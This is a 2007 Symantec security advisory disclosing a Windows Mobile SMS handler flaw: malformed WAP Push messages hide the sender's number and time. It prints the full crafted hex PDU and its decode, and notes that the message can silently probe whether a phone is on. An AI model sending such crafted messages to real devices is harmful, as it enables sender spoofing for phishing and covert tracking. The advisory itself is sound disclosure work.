-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Symantec Vulnerability Research http://www.symantec.com/research Security Advisory Advisory ID: SYMSA-2007-011 Advisory Title: Microsoft Windows Mobile 5 PocketPC Phone Edition SMS Handler Issue With Regard to Malformed WAP Push Messages Hiding Source Author: Ollie Whitehouse / ollie_whitehouse@xxxxxxxxxxxx Release Date: 17-10-2007 Application: Microsoft Windows Mobile 5 PocketPC Platform: Windows Severity: Information Disclosure Vendor status: Vendor Reviewed CVE Number: CVE-2007-5493 Reference: http://www.securityfocus.com/bid/26019 Overview: Microsoft Windows Mobile 6 is the latest version of Microsoft's mobile operating system. Designed for small embedded devices, Windows Mobile is the CE feature set designed for PDA's and mobile telephones. Microsoft Windows Mobile comes in three distinct flavors, Pocket PC, Pocket PC Phone Edition and SmartPhone A vulnerability has been discovered in the SMS handler on Windows Mobile 2005 Pocket PC Phone edition which means the sender of the original SMS message can be masked from the recipient when sent a specifically crafted WAP PUSH message. Details: Symantec discovered that a slightly malformed WAP PUSH message could be used to hide the originating sender of the message on Windows Mobile 2005. The original PDU can be seen in [1]. The following PDU will cause the Pocket PC Phone edition SMS handler to incorrectly decode the PDU. The result of which is both the sending telephone number and the sending time are incorrect. [1] PDU (Line wrapped) 079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62 756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62 696C652E636F6D000101 The decode of the PDU can be seen in [2]. This decode was achieved with PDUSpy from http://www.nobbi.com/pduspy.htm. When this message is received by a SmartPhone it will be silently discarded, which can also be useful to an attacker who wishes to ascertain if a cellphone is on without alerting the user through SMS delivery receipts. [2] Decode of PDU from PDUSpy PDU LENGTH IS 118 BYTES ADDRESS OF DELIVERING SMSC NUMBER IS : +447785016005 TYPE OF NR. : International NPI : ISDN/Telephone (E.164/163) MESSAGE HEADER FLAGS MESSAGE TYPE : SMS SUBMIT REJECT DUPLICATES : NO VALIDITY PERIOD : RELATIVE REPLY PATH : NO USER DATA HEADER : PRESENT REQ. STATUS REPORT : NO MSG REFERENCE NR. : 34 (0x22) DESTINATION ADDRESS NUMBER IS : +447716299660 TYPE OF NR. : International NPI : ISDN/Telephone (E.164/163) PROTOCOL IDENTIFIER (0x00) MESSAGE ENTITIES : SME-to-SME PROTOCOL USED : Implicit / SC-specific DATA CODING SCHEME (0x04) AUTO-DELETION : OFF COMPRESSION : OFF MESSAGE CLASS : NONE ALPHABET USED : 8bit data VALIDITY OF MESSAGE : 24.0 hrs USER DATA PART OF SM USER DATA LENGTH : 96 octets UDH LENGTH : 6 octets UDH : 05 04 0B 84 23 F0 UDH ELEMENTS : 05 - Appl. port addressing 16bit 4 (0x04) Bytes Information Element 09200 : SOURCE port is: allocated by IANA 02948 : DESTINATION port is: allocated by IANA --- DATA ---------------------- 05 04 0B 84 23 F0 USER DATA (TEXT) : %®?ê¯?´?jEÆ symantec?Symantec bulkSMS (Unregistered Ver) - LogixMobile.com Vendor Response: A vulnerability has been discovered in the SMS handler. If a malicious message with no sender was received by a user on their device, the user may be enticed in taking action or clicking the URI that could lead to a second order attack. Mitigating Factors: By default Windows mobile device policy require SI messages to be authenticated. The Mobile Operators have the ability to change the policy to not requiring authentication in order for 3rd party ring tones and other SI messages. Microsoft will look into a different architecture in future versions. Recommendation: Contact your mobile operator to ensure the proper policy is set on your device. Common Vulnerabilities and Exposures (CVE) Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CVE-2007-5493 - -------Symantec Vulnerability Research Advisory Information------- For questions about this advisory, or to report an error: research@xxxxxxxxxxxx For details on Symantec's Vulnerability Reporting Policy: http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf Symantec Vulnerability Research Advisory Archive: http://www.symantec.com/research/ Symantec Vulnerability Research GPG Key: http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc - -------------Symantec Product Advisory Information------------- To Report a Security Vulnerability in a Symantec Product: secure@xxxxxxxxxxxx For general information on Symantec's Product Vulnerability reporting and response: http://www.symantec.com/security/ Symantec Product Advisory Archive: http://www.symantec.com/avcenter/security/SymantecAdvisories.html Symantec Product Advisory PGP Key: http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc - --------------------------------------------------------------- Copyright (c) 2007 by Symantec Corp. Permission to redistribute this alert electronically is granted as long as it is not edited in any way unless authorized by Symantec Consulting Services. Reprinting the whole or part of this alert in any medium other than electronically requires permission from research@xxxxxxxxxxxxx Disclaimer The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. Symantec, Symantec products, and Symantec Consulting Services are registered trademarks of Symantec Corp. and/or affiliated companies in the United States and other countries. All other registered and unregistered trademarks represented in this document are the sole property of their respective companies/owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) iD8DBQFHFlXzuk7IIFI45IARAk+NAKCk8GGaxtg7Z9g0zBTX8BzHt9LPkwCgwOeD 1qhcVHQ07YHEdgF0zUP81/k= =pFeF -----END PGP SIGNATURE-----